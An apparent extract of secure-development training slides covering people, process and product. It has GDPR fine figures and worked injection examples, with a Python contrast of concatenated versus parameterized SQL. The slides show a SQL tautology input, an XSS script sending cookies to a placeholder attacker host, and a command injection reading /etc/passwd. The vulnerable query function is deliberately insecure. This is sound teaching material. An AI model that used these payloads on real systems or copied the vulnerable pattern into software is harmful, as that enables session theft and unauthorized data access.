The document discusses securing systems by focusing on people, processes, and products. For people, it recommends making security easy and monitoring for security events. For processes, it suggests analyzing misuse cases, threat modeling using STRIDE, and formalizing procedures. For products, it advises getting trained, using proper APIs and tools, testing systems, and addressing vulnerabilities like SQL injection. The overall aim is to secure systems through a balanced approach across people, processes, and technology.
12. Impact of not taking care has changed a bit
*In Dutch: Algemene verordening gegevensbescherming (AVG)
ING Bank (2017): ~ 680 Million
Alphabet (Google) (2017): ~ 4.4 Billion
Microsoft (2017): ~ 3.6 Billion
Rabobank (2017): ~ 104 Million
Facebook (2017): ~ 1.6 Billion
65. Product
Input: 1234
SELECT accountNumber, balance FROM accounts
WHERE account_owner_id = 1234
Input: 1%20or%201%2f1
SELECT accountNumber, balance FROM accounts
WHERE account_owner_id = 1 or 1=1
69. Product
SQL injection (expected query, then injected query):
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1234
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1 or 1=1
Cross-site scripting (expected output, then injected output):
<H1>Hi Rolf</H1>
<H1>Hi <script>window.location="http://some_attacker/cookie.cgi?steal=" +escape(document.cookie)</script> </H1>
Command injection (expected command, then injected command):
$ rm tempfile
$ rm tempfile;id;cat /etc/passwd
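Added example, not code from the slides: the slide-65 account query built by string concatenation next to the same query with a bound parameter (the "correct API" of the summary slide), plus output escaping for the H1 greeting. The table rows, column types and account numbers are constructed for the demonstration.

```python
import html
import sqlite3

# Constructed sample rows (not from the slides): owner 1234 has two accounts.
ACCOUNTS = [
    (1234, "NL01-0001", 500),
    (1234, "NL01-0002", 250),
    (9999, "NL01-0003", 99999),
]


def setup_db():
    """In-memory SQLite table using the column names from the slides."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts (account_owner_id INTEGER, "
        "accountNumber TEXT, balance INTEGER)"
    )
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", ACCOUNTS)
    return conn


def balances_vulnerable(conn, owner_id):
    """Query built by string concatenation, as on slide 65."""
    # The user's text becomes part of the SQL, so "1 or 1=1" rewrites
    # the WHERE clause and every owner's accounts are returned.
    sql = ("SELECT accountNumber, balance FROM accounts "
           "WHERE account_owner_id = " + str(owner_id))
    return conn.execute(sql).fetchall()


def balances_safe(conn, owner_id):
    """Same query with a bound parameter (the 'correct API' of slide 92)."""
    # The value is sent separately from the statement and compared as data;
    # "1 or 1=1" is just a string that matches no owner id.
    sql = ("SELECT accountNumber, balance FROM accounts "
           "WHERE account_owner_id = ?")
    return conn.execute(sql, (owner_id,)).fetchall()


def greeting(name):
    """Escapes the name before placing it in the H1 of slide 69, so a
    <script> tag is rendered as text instead of executed."""
    return "<H1>Hi " + html.escape(name) + "</H1>"
```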
92. Summary
People
• Make it easy to be safe
• Security event monitoring
• …
Process
• Misuse cases
• Threat modeling
• STRIDE
• …
Product
• Get trained
• Use the correct APIs and tools
• Have things tested
• …